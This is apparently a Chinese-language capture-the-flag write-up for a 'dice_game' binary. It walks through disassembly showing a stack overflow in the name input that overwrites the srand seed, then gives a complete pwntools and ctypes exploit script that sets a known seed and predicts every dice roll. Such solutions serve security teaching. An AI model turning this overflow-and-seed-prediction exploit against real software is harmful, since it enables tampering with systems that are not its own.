分析过程

运行程序分析，能得到两个输入点1是name 2是point（输入1-6的数字，与程序生成的随机数进行比对）
2、分析随机数是如何生成的,汇编代码如下

push    rbp
mov     rbp, rsp
sub     rsp, 50h
lea     rdx, [rbp+buf]
mov     eax, 0
mov     ecx, 6
mov     rdi, rdx
rep stosq
mov     edi, 0          ; timer
call    time
mov     qword ptr [rbp+seed], rax                    #通过time获取随机数seed，并将seed放在栈上
lea     rdi, aWelcomeLetMeKn ; "Welcome, let me know your name: "
mov     eax, 0
call    printf
mov     rax, cs:stdout_ptr
mov     rax, [rax]
mov     rdi, rax        ; stream
call    fflush
lea     rax, [rbp+buf]
mov     edx, 50h ; 'P'  ; nbytes
mov     rsi, rax        ; buf
mov     edi, 0          ; fd
call    read                                         #调用read获取用户输入（发生栈溢出，可以覆盖seed）
mov     [rbp+var_18], rax
cmp     [rbp+var_18], 31h
jg      short loc_C14
mov     rax, [rbp+var_18]
sub     rax, 1
mov     [rbp+rax+buf], 0
lea     rax, [rbp+buf]
mov     rsi, rax
lea     rdi, aHiSLetSPlayAGa ; "Hi, %s. Let's play a game.\n"
mov     eax, 0
call    printf
mov     rax, cs:stdout_ptr
mov     rax, [rax]
mov     rdi, rax        ; stream
call    fflush
mov     rax, qword ptr [rbp+seed]                 #从栈上获取seed
mov     edi, eax        ; seed
call    srand                                     #用栈上的seed生成随机数
mov     [rbp+var_4], 1
mov     [rbp+var_19], 0

发现用于生成随机数的seed可以在输入name的时候通过栈溢出来覆盖，导致生成的随机数我们可以预测
4.利用ctypes库，覆盖seed的值并通过调用srand/rand预测出会出现的随机数
5.exp如下

from pwn import *
from ctypes import *
libc = cdll.LoadLibrary("libc.so.6")
libc.srand(0x6b6b6b6b6b6b6b6b)
rand_list = []
for i in range(50):
    rand_list.append(libc.rand()%6+1)
sh = process('dice_game')
context.log_level = 'debug'
#a=input()
sh.recvuntil('name:')
#gdb.attach(sh)
#pause()
sh.sendline('kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk')
for i in range(50):
    sh.recvuntil('point(1~6): ')
    sh.sendline(str(rand_list[i]))
sh.interactive()